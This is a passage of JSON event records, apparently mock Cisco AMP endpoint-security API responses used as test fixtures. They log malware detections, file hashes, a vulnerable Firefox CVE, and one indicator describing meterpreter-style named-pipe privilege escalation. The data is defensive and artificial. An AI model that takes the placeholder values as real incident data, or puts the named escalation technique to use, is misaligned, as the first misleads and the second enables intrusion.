Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat 
